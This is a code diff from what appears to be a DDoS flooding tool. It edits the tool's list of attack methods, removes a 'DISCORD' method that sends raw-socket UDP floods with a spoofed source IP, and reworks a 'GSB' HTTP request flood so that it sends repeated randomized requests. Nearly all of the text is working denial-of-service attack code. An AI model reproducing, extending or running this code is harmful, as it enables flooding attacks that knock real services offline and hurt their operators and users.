@@ -128,7 +128,7 @@ class Methods:
128128 LAYER4_METHODS : Set [str ] = {* LAYER4_AMP ,
129129 "TCP" , "UDP" , "SYN" , "VSE" , "MINECRAFT" ,
130130 "MCBOT" , "CONNECTION" , "CPS" , "FIVEM" , "FIVEM-TOKEN" ,
131- "TS3" , "MCPE" , "ICMP" , "DISCORD" , " OVH-UDP" ,
131+ "TS3" , "MCPE" , "ICMP" , "OVH-UDP" ,
132132 }
133133
134134 ALL_METHODS : Set [str ] = {* LAYER4_METHODS , * LAYER7_METHODS }
@@ -402,7 +402,6 @@ def __init__(self,
402402 "FIVEM" : self .FIVEM ,
403403 "FIVEM-TOKEN" : self .FIVEMTOKEN ,
404404 "OVH-UDP" : self .OVHUDP ,
405- "DISCORD" : self .DISCORD ,
406405 "MINECRAFT" : self .MINECRAFT ,
407406 "CPS" : self .CPS ,
408407 "CONNECTION" : self .CONNECTION ,
@@ -538,14 +537,6 @@ def VSE(self) -> None:
538537 continue
539538 Tools .safe_close (s )
540539
541- def DISCORD (self ) -> None :
542- payload = self ._generate_discord ()
543- with socket (AF_INET , SOCK_RAW , IPPROTO_UDP ) as s :
544- s .setsockopt (IPPROTO_IP , IP_HDRINCL , 1 )
545- while Tools .sendto (s , payload , self ._target ):
546- continue
547- Tools .safe_close (s )
548-
549540 def FIVEMTOKEN (self ) -> None :
550541 global BYTES_SEND , REQUESTS_SENT
551542
@@ -626,18 +617,6 @@ def _generate_ovhudp(self) -> List[bytes]:
626617
627618 return packets
628619
629- def _generate_discord (self ) -> bytes :
630- ip : IP = IP ()
631- ip .set_ip_src (__ip__ )
632- ip .set_ip_dst (self ._target [0 ])
633- udp : UDP = UDP ()
634- udp .set_uh_sport (ProxyTools .Random .rand_int (32768 , 65535 ))
635- udp .set_uh_dport (self ._target [1 ])
636- payload_data = bytes ([ProxyTools .Random .rand_int (0 , 255 ) for _ in range (40 )])
637- udp .contains (Data (payload_data ))
638- ip .contains (udp )
639- return ip .get_packet ()
640-
641620 def _genrate_syn (self ) -> bytes :
642621 ip : IP = IP ()
643622 ip .set_ip_src (__ip__ )
@@ -1174,7 +1153,10 @@ def BYPASS(self):
11741153 Tools .safe_close (s )
11751154
11761155 def GSB (self ):
1177- payload = str .encode ("%s %s?qs=%s HTTP/1.1\r \n " % (self ._req_type ,
1156+ s = None
1157+ with suppress (Exception ), self .open_connection () as s :
1158+ for _ in range (self ._rpc ):
1159+ payload = str .encode ("%s %s?qs=%s HTTP/1.1\r \n " % (self ._req_type ,
11781160 self ._target .raw_path_qs ,
11791161 ProxyTools .Random .rand_str (6 )) +
11801162 "Host: %s\r \n " % self ._target .authority +
@@ -1190,9 +1172,6 @@ def GSB(self):
11901172 'Sec-Gpc: 1\r \n '
11911173 'Pragma: no-cache\r \n '
11921174 'Upgrade-Insecure-Requests: 1\r \n \r \n ' )
1193- s = None
1194- with suppress (Exception ), self .open_connection () as s :
1195- for _ in range (self ._rpc ):
11961175 Tools .send (s , payload )
11971176 Tools .safe_close (s )
11981177
0 commit comments